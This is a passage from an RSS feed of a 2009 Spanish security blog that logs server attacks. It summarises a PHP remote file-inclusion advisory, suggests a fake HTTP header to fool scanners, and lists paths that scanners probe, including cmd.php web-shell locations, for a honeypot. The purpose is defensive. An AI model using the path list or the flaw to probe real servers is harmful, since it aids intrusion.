			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/06/01/systempath/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>&#8220;REX[INCLUDE_PATH]&#8220;</title>
		<link>http://ataqueservidor.wordpress.com/2009/06/01/rexinclude_path/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/06/01/rexinclude_path/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 10:16:03 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=146</guid>
		<description><![CDATA[Input passed to the &#8220;REX[INCLUDE_PATH]&#8221; parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
Source: http://secunia.com/advisories/20395/
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=146&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Input passed to the &#8220;REX[INCLUDE_PATH]&#8221; parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.</p>
<p>Source: <a href="http://secunia.com/advisories/20395/">http://secunia.com/advisories/20395/</a></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/146/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/146/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/146/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/146/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/146/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/146/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/146/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/146/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/146/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/146/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=146&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/06/01/rexinclude_path/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Primero preguntar</title>
		<link>http://ataqueservidor.wordpress.com/2009/06/01/primero-preguntar/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/06/01/primero-preguntar/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 10:08:53 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Scanner]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=143</guid>
		<description><![CDATA[¿Qué S.O. estoy estoy buscando?
http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/
Para engañar a estos buscadores de tesoros podemos añadir una variable HTTP Headers con la palabra unix (Custom HTTP headers), de esta forma se piensan que están atacando un sistema Unix y realmente es un entorno Microsoft.
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=143&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>¿Qué S.O. estoy estoy buscando?</p>
<blockquote><p><a href="http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/">http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/</a></p></blockquote>
<p>Para engañar a estos buscadores de tesoros podemos añadir una variable HTTP Headers con la palabra unix (Custom HTTP headers), de esta forma se piensan que están atacando un sistema Unix y realmente es un entorno Microsoft.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/143/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/143/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/143/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/143/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/143/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/143/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/143/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/143/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/143/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/143/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=143&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/06/01/primero-preguntar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Preparar despliegue de honeypot</title>
		<link>http://ataqueservidor.wordpress.com/2009/05/31/preparar-despliegue-de-honeypot/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/05/31/preparar-despliegue-de-honeypot/#comments</comments>
		<pubDate>Sun, 31 May 2009 22:06:18 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Honeypot]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=141</guid>
		<description><![CDATA[Incluir las carpetas que rastrean normalmente los scanners para ver el ataque que intentan:

/user/soapCaller.bs
/roundcube/
/webmail/
/abc.php
/pp/anp.php
/thisdoesnotexistahaha.php
/cmd.php
/portal/cacti/cmd.php
/portal/cmd.php
/stats/cmd.php

       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=141&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Incluir las carpetas que rastrean normalmente los scanners para ver el ataque que intentan:</p>
<ul>
<li>/user/soapCaller.bs</li>
<li>/roundcube/</li>
<li>/webmail/</li>
<li>/abc.php</li>
<li>/pp/anp.php</li>
<li>/thisdoesnotexistahaha.php</li>
<li>/cmd.php</li>
<li>/portal/cacti/cmd.php</li>
<li>/portal/cmd.php</li>
<li>/stats/cmd.php</li>
</ul>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/141/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/141/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/141/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/141/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/141/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/141/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/141/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/141/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/141/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/141/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=141&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/05/31/preparar-despliegue-de-honeypot/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
	</channel>
</rss>